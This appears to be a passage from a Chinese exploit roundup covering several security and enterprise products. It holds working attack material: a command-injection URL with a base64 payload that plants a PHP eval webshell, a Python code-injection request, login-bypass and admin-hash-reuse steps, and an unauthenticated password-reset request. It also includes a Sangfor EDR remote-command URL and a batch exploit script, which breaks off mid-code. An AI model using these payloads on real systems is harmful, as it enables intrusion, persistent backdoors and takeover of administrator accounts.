https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
3.getshell访问路径:
/var/www/shterm/resources/qrcode/lbj77.php
https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086)
据说还是另外一个版本是java的:
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
二、天融信TopApp-LB 负载均衡系统Sql注入漏洞
2.2个历史漏洞仍然可以复现。
https://www.uedbox.com/post/21626/
用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登陆)
三、用友GRP-u8 注入
四、绿盟UTS综合威胁探针管理员任意登录
逻辑漏洞,利用方式参考:https://www.hackbug.net/archives/112.html
1、修改登录数据包 {"status":false,"mag":""} -> {"status":true,"mag":""}
2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)
3、再次登录,替换密码上个数据包中md5密码
4、登录成功
五、天融信数据防泄漏系统越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd,接口未授权访问,造成直接修改任意用户密码,默认superman账户uid为1
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
六、WPS Office 图片解析错误导致堆损坏,任意代码执行
看上去(算了看不懂... ,漏洞利用可能导致拒绝服务。
相关参考:
http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html
fofa指纹:title="SANGFOR终端检测响应平台"
漏洞利用:
payload:
https://ip/ui/login.php?user=需登录的用户名
列如:
https://1.1.1.1:1980/ui/login.php?user=admin
八、某信服EDR漏洞-包含payload
1.漏洞利用方法:
https://xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami
2.批量利用方法
网上已经放出批量利用方法了,如下:https://github.com/A2gel/sangfor-edr-exploit
# -*- coding: utf-8 -*-
# @Time : 2020/8/17
# @Author : Angel
# @File : edr.py
# 感谢大佬提供Command execute部分代码
import requests
import re
import urllib3
import sys
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def hello():
"""
init function
:return: init print
"""
print (
"""SangFor EDR remote command code exploit
Angel 20200817
Github: https://github.com/A2gel/sangfor-edr-exploit
Command: python edr.py url http://10.10.10.0/
Command: python edr.py file 1.txt whoami""")
def readFile(filename):
"""
逐行读取文件内容并返回列表
:param filename: 文件名
:return: 逐行分割的文件内容
"""
list=[]
keywords = open('./'+filename, 'r')
line = keywords.readline().strip('\n')
while (line):
list.append(line)
line = keywords.readline().strip('\n')
keywords.close()
return list
def log(name,value):
"""
逐行写入文件
:param name: 文件名
:param value: 文件内容
:return: 空
"""
save = file(str(name)+".txt", "a+")
save.write(str(value)+"\n")
save.close()
def rce(host,command):
"""
远程命令执行核心函数
:param host: URL信息
:param command: 执行的命令
:return: 成功执行返回命令回显 失败打印faild 返回-
"""
headers={
'Connection': 'close',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
command=base64.b64encode(command)
command="echo \""+command+"\""+"|base64 -d|bash"
command = command.replace(" ","$IFS")
url="{}/tool/log/c.php?strip_slashes=system&host={}".format(host,command)
#print url
try:
response = requests.get(url,verify=False,headers=headers)
response.raise_for_status()
response.encoding = "utf-8"
#print response.text
res=re.findall(r'Log Helper
(.+?)